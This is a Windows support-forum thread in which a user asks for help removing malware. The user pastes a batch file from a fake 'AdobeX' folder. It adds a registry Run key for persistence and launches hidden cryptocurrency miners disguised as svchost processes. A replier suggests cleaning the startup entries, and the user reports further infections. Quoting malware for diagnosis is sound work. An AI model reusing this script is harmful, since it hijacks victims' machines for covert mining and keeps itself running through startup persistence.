AdobeX (winsvchost.exe , ssvchost.exe)

P

PadeLee

New member
Local time
5:19 AM
Messages
31
Hello, i had a bsod problem and @Arc told me to remove ESET nod 32 and install Microsft Essentials and Malware Bytes. That fixed the problem but now i think i have got virus on my pc! In %AppData%/Roaming there is a folder called AdobeX that is pretty suspicious and contains winsvchost.exe and some other .bat files which seem suspicious too! the bat file contains these

(@echo off
%windir%\system32\taskkill.exe /f /im ssvchost.exe
%windir%\system32\taskkill.exe /f /im winsvchost.exe
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeUpdate /d "wscript \"%appdata%\AdobeX\invis.vbs\" \"%appdata%\AdobeX\bat.bat\"" /f
IF NOT EXIST "%ProgramFiles(x86)%" (
start /b /low "a" "%appdata%\AdobeX\ssvchost.exe" -o ypool.net - cryptocurrency mining pool -u BRZ.PTS -p x -m256
)
IF EXIST "%ProgramFiles(x86)%" (
start /b /low "a" "%appdata%\AdobeX\winsvchost.exe" -o ypool.net - cryptocurrency mining pool -u BRZ.x -p x -target 9 -bttarget 9 -m 43 -primes 960000 -primorial 43 -s 1024000 -d 25 -se 10
)


My pc crashes and other things! I have done restore but nothing. Every startup the winsvchost.exe runs! I have deleted the folder but nothing! it gets deleted but after restart is there !

Please help me im in desperate need!
 

My Computer My Computer

At a glance

Microsoft Windows 8.1 Pro 64-biAMD FX 6100CORSAIR Vengeance 8GB 1600 (2 x 4GB)Asus GeForce GTX 760
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Microsoft Windows 8.1 Pro 64-bi
CPU
AMD FX 6100
Motherboard
GA-970A-D3
Memory
CORSAIR Vengeance 8GB 1600 (2 x 4GB)
Graphics Card(s)
Asus GeForce GTX 760
Screen Resolution
1920x1080
Hard Drives
OS: WD Black 1TB. Other: WD Blue 650GB
Cooling
CPU: CM Hyper 412S
Antivirus
Bitdefender Total Security 2014
Browser
Google Chrome 64bit
Looks like Bit coin Mining.

Could you install CCleaner and go Tools --> Startup and delete the batch files from there.

Also look at Scheduled Tasks in CCleaner.
 

My Computer My Computer

At a glance

Windows 7 Ultimate x64 SP1Intel i5 2.4GHz8GB1GB AMD Radeon HD 7470M
Computer type
Laptop
Computer Manufacturer/Model Number
HP 4530s
OS
Windows 7 Ultimate x64 SP1
CPU
Intel i5 2.4GHz
Memory
8GB
Graphics Card(s)
1GB AMD Radeon HD 7470M
Sound Card
IDT High Definition Audio
Monitor(s) Displays
Asus VX238H 16:9 23.6" 1ms Gaming Monitor
Screen Resolution
1920 x 1080
Hard Drives
500GB Internal
1.5TB External
Keyboard
Logitech K270
Mouse
Logitech M185
Internet Speed
1.5mb/s
Antivirus
Malwarebytes Antimalware Premium 2.0.4.1028
Browser
Firefox
so it seems that it is not that simple. After a little research i founnd viruses all around my pc. Cannot delete them and microsoft essentials doesn't recognise them as viruses doh ! stupid thing. How to delete them. so confused. I have proccess napsnap.exe that is MFC Interface and other shit i don't know and i cannot stop it from starting up with my system! What to do PLEASE
 

My Computer My Computer

At a glance

Microsoft Windows 8.1 Pro 64-biAMD FX 6100CORSAIR Vengeance 8GB 1600 (2 x 4GB)Asus GeForce GTX 760
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Microsoft Windows 8.1 Pro 64-bi
CPU
AMD FX 6100
Motherboard
GA-970A-D3
Memory
CORSAIR Vengeance 8GB 1600 (2 x 4GB)
Graphics Card(s)
Asus GeForce GTX 760
Screen Resolution
1920x1080
Hard Drives
OS: WD Black 1TB. Other: WD Blue 650GB
Cooling
CPU: CM Hyper 412S
Antivirus
Bitdefender Total Security 2014
Browser
Google Chrome 64bit
So i researched it even deeper! I think im infected of a vbs virus! I got usbfix and ran it! but some keys in registry called vbs script and other cannot be deleted!
 

My Computer My Computer

At a glance

Microsoft Windows 8.1 Pro 64-biAMD FX 6100CORSAIR Vengeance 8GB 1600 (2 x 4GB)Asus GeForce GTX 760
Computer type
PC/Desktop
Computer Manufacturer/Model Number
custom build
OS
Microsoft Windows 8.1 Pro 64-bi
CPU
AMD FX 6100
Motherboard
GA-970A-D3
Memory
CORSAIR Vengeance 8GB 1600 (2 x 4GB)
Graphics Card(s)
Asus GeForce GTX 760
Screen Resolution
1920x1080
Hard Drives
OS: WD Black 1TB. Other: WD Blue 650GB
Cooling
CPU: CM Hyper 412S
Antivirus
Bitdefender Total Security 2014
Browser
Google Chrome 64bit
You must log in or register to reply here.

Similar threads

Type 1 Font Parsing Remote Code Execution Vulnerability for Windows
Replies
10
Views
2K
bobby76
B
Acceleration of GUI on the classic theme of Windows 7
Replies
2
Views
6K
Frank McRoy
F
Serious Problem "services.msc" (and all the .msc) have disappeared
Replies
4
Views
4K
Zappastixs
Z
Solved Trojans Necurs.A.44 and Crypt.ULPM.Gen detected by Avira
2
Replies
24
Views
8K
Time Pink
T
Windows 7 constantly reports low memory
Replies
12
Views
15K
bobafetthotmail
bobafetthotmail
Back
Top